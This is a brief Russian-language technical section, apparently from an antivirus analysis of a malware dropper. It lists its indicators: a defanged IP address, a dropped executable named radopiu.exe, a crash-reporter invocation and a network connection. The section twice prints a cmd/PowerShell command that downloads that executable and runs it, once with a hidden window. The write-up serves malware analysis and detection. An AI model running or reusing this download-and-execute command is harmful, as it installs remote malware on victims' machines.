Техническая информация
- http://19#.#45.113.200/index.php как %temp%\radopiu.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://19#.#45.113.200/index.php','%TEMP%\radopiu.exe');Start-Process '%TEMP%\radopiu.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1170303.cvr
- '19#.#45.113.200':80
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://19#.#45.113.200/index.php','%TEMP%\radopiu.exe');Start-Process '%TEMP%\radopiu.exe';' (со скрытым окном)